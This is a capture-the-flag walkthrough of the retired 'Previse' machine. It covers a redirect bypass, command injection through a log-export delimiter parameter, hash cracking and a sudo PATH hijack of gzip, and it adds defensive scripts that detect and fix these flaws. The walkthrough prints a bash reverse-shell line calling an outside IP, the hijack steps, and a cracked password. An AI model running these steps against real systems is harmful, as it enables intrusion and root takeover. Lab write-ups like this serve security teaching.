Previse is a retired vulnerable machine running Linux. The goal is to obtain the user and root flags by exploiting its vulnerabilities.
We start with an Nmap scan to identify the target machine and its services.
Classic Scan
Full Port Scan
The Nmap scan shows two open ports: 22/tcp (SSH, OpenSSH 7.6) and 80/tcp (HTTP, Apache httpd).
Since port 22 offers no obvious vulnerability, we move on to port 80 and enumerate the web application in the browser.
We found nothing useful on the site itself, and attempts with default passwords failed, so we used gobuster to scan for web files and directories.
The directory and file scan found the files and directories shown in the screenshot above.
We visited the detected files and directories; most of them redirected to login.php, and the rest contained nothing of interest.
The interesting one was nav.php: whatever we clicked there redirected to login.php. What we need to do is intercept the traffic with Burp Suite and modify it while the redirect happens.
It has a "Create account" link; hovering over it shows that it points to accounts.php. We open Burp Suite and intercept the request to it.
We captured the request here.
Now let's look at the response to this request.
As you can see, the server returns 302 Found. Let's change it to 200 OK and forward the response again.
We now have access to the add new accounts page. Let's create a user right away.
We created credentials for the user muhammed aygun.
We were able to log in on the login page with these credentials.
After logging in we continued enumerating. The FILE tab drew our attention: it has an upload section (a shell could be uploaded) and a config file that might contain a user with a password. We also noted the username newguy as a possible user.
First, let's download the backup and look for credential information in it.
We could not find any credential information.
Let's deal with the upload section.
Let's upload the Pentest Monkey PHP reverse shell.
The upload succeeded. Let's see if it works.
The file appears as download.php?file=34; we click on that URL.
Our PHP reverse shell did not execute and we did not get a shell, so we continue enumerating.
In the Management data section, the logs from the log data section can be exported delimited by comma, space or tab.
Let's intercept this with Burp Suite and, in Repeater, see whether we can append something to the delim parameter.
The whoami and id commands showed nothing for some reason, so we made a request to our own host with curl to see whether the command executes.
Good: the injected command reached us with a request, so we can get a reverse shell.
Sending the reverse shell payload without URL encoding did not give us a shell at all, so we URL-encoded it with Ctrl+U, and then we got our reverse shell.
As you can see, we got our shell.
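Both server-side defects used so far show up in source review: a redirect on accounts.php after which PHP keeps generating the page (so a client that ignores the 302 still receives the protected content), and a delim parameter that reaches a shell command. The following script is an added example, not code from this writeup or from the machine: it runs a small static check over constructed PHP fixtures (the file names and snippets are made up for the demonstration) and flags header('Location: ...') calls that are not followed by exit/die, and exec-family calls whose argument is built from a variable without escapeshellarg().

```shell
#!/bin/sh
# Added example, not part of the original writeup or the machine's code: a small
# static check for the two server-side defects described above.
#   1. header('Location: ...') not followed by exit/die: PHP keeps rendering the
#      page after sending the redirect, so a client that ignores the 302 gets
#      the protected content.
#   2. exec()/shell_exec()/system() etc. whose argument is built from a
#      variable, the pattern behind the delim command injection.

# Report redirects whose next non-blank line is not an exit/die call.
check_redirects() {    # $1 = path to a PHP file
    awk '
        pending && $0 !~ /^[[:space:]]*$/ {
            if ($0 !~ /^[[:space:]]*(exit|die)[[:space:];(]/)
                printf "%s:%d redirect without exit\n", FILENAME, pending
            pending = 0
        }
        /header[[:space:]]*\([[:space:]]*["'\'']Location:/ { pending = NR }
        END { if (pending) printf "%s:%d redirect without exit\n", FILENAME, pending }
    ' "$1"
}

# Report shell-executing calls that interpolate or concatenate a variable and
# do not pass it through escapeshellarg()/escapeshellcmd() on the same line.
check_shell_calls() {  # $1 = path to a PHP file
    awk '
        /(^|[^A-Za-z0-9_])(exec|shell_exec|system|passthru|popen|proc_open)[[:space:]]*\(.*\$/ &&
        $0 !~ /escapeshell(arg|cmd)/ {
            printf "%s:%d shell command built from a variable\n", FILENAME, NR
        }
    ' "$1"
}

# Run both checks over every .php file in a directory.
audit_dir() {          # $1 = directory
    for f in "$1"/*.php; do
        check_redirects "$f"
        check_shell_calls "$f"
    done
}

# Constructed fixtures: a vulnerable and a fixed version of each pattern.
make_fixtures() {
    dir=$(mktemp -d)
    cat > "$dir/accounts_vuln.php" <<'EOF'
<?php
session_start();
if (!isset($_SESSION['user'])) {
    header('Location: login.php');
}
echo "<form>create account</form>";
EOF
    cat > "$dir/accounts_fixed.php" <<'EOF'
<?php
session_start();
if (!isset($_SESSION['user'])) {
    header('Location: login.php');
    exit;
}
echo "<form>create account</form>";
EOF
    cat > "$dir/logs_vuln.php" <<'EOF'
<?php
$delim = $_POST['delim'];
exec("/usr/bin/sort --field-separator=$delim /var/www/log.csv", $out);
EOF
    cat > "$dir/logs_fixed.php" <<'EOF'
<?php
$allowed = array('comma' => ',', 'space' => ' ', 'tab' => "\t");
if (!isset($_POST['delim'], $allowed[$_POST['delim']])) {
    http_response_code(400);
    exit;
}
exec('/usr/bin/sort --field-separator=' . escapeshellarg($allowed[$_POST['delim']]) . ' /var/www/log.csv', $out);
EOF
    printf '%s\n' "$dir"
}

audit_dir "$(make_fixtures)"
```

Only the two vulnerable fixtures are reported (accounts_vuln.php line 4 and logs_vuln.php line 3). The fixed versions show the two changes that close the holes: an `exit;` right after the redirect header so nothing is rendered for an unauthenticated request, and an allowlist of delimiter names mapped to fixed characters, passed through escapeshellarg() before reaching the shell.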
Since we are the www-data user, our privileges are very limited, so we perform local enumeration to escalate them.
The SQL username and password were found in config.php.
Let's connect to MySQL with these credentials.
Here we have obtained the password hashes of the users.
Let’s try to crack the password hash of user m4lwhere with john
First, we save the hash we obtained to a hash file with nano,
and then we crack it with hashcat.
As we can see, the hash cracked to "ilovecody112235!".
Let's connect over SSH as user m4lwhere.
We made the ssh connection successfully and got our user flag.
Without root privileges we get a permission denied error, so we perform local enumeration to escalate privileges.
With sudo -l we list what can be run with root privileges without a password.
We found the script access_backup.sh. Looking at its contents, we saw that it compresses the log files with gzip.
We can apply PATH hijacking here: instead of the real gzip, if we create a file named gzip that spawns a shell for us, the script runs our file and we get our shell.
echo $PATH
We ran this command to see the directories in which executables are looked up, and then located the gzip binary with
which gzip
So far we have done local enumeration to understand the machine.
Now, first of all,
cd /dev/shm
We moved to the shm folder because it is writable for us without permission restrictions, so we can work there easily.
export PATH=.:$PATH
With this command we prepend the current directory to PATH.
nano gzip
Then we create a file named gzip with the following content:
#!/bin/bash
/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.13/4723 0>&1'
Let’s save and exit
chmod +x gzip
After making it executable, typing
which gzip
should now show our own file, and it did.
Now, before running /opt/scripts/access_backup.sh with sudo, we start a listener on the port specified in the reverse shell.
This way we obtained root privileges and our root flag.
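The hijack works only because the script calls gzip by its bare name and inherits the PATH of whoever runs it under sudo. The following is an added example, not the machine's access_backup.sh: it rebuilds the situation in a temporary directory (the bin and shm folders and the two gzip scripts are constructed stand-ins for /bin and /dev/shm) and contrasts the vulnerable pattern with a hardened one that sets its own PATH before calling anything.

```shell
#!/bin/sh
# Added example, not the machine's /opt/scripts/access_backup.sh: reproduces
# the PATH hijack in a throw-away directory and shows the fix, a script that
# sets its own PATH (or calls /bin/gzip by absolute path) instead of trusting
# the PATH exported by whoever runs it under sudo.

# Print the file the shell would execute for command $1 under PATH $2.
resolve_cmd() {
    ( PATH="$2"; command -v "$1" 2>/dev/null )
}

# Constructed lab: "bin" stands in for /bin with the real gzip, "shm" stands in
# for the world-writable /dev/shm holding the impostor.
make_lab() {
    lab=$(mktemp -d)
    mkdir -p "$lab/bin" "$lab/shm"
    printf '#!/bin/sh\necho real-gzip\n' > "$lab/bin/gzip"
    printf '#!/bin/sh\necho impostor\n' > "$lab/shm/gzip"
    chmod +x "$lab/bin/gzip" "$lab/shm/gzip"
    printf '%s\n' "$lab"
}

# Vulnerable pattern: calls gzip by bare name and inherits the caller's PATH,
# which has been set to ".:<system dirs>" from inside shm.
vulnerable_backup() {   # $1 = lab dir
    (
        cd "$1/shm"
        PATH=".:$1/bin"; export PATH   # caller's environment (export PATH=.:$PATH)
        gzip                           # the script's own line, unchanged
    )
}

# Hardened pattern: the script resets PATH to trusted directories before doing
# anything, so the caller's PATH is irrelevant. Calling /bin/gzip by absolute
# path has the same effect.
hardened_backup() {     # $1 = lab dir
    (
        cd "$1/shm"
        PATH=".:$1/bin"; export PATH   # same hostile environment
        PATH="$1/bin"; export PATH     # first line of the fixed script (real: /usr/bin:/bin)
        gzip
    )
}

lab=$(make_lab)
echo "PATH=.:... resolves gzip to: $(resolve_cmd gzip "$lab/shm:$lab/bin")"
echo "vulnerable script ran: $(vulnerable_backup "$lab")"
echo "hardened script ran:   $(hardened_backup "$lab")"
```

The vulnerable function prints "impostor" and the hardened one prints "real-gzip" from the same hostile environment. Setting PATH inside the script is the change that belongs in the script itself; sudo's `secure_path` option, where sudoers sets it, resets PATH for every sudo command and closes the same gap from the other side.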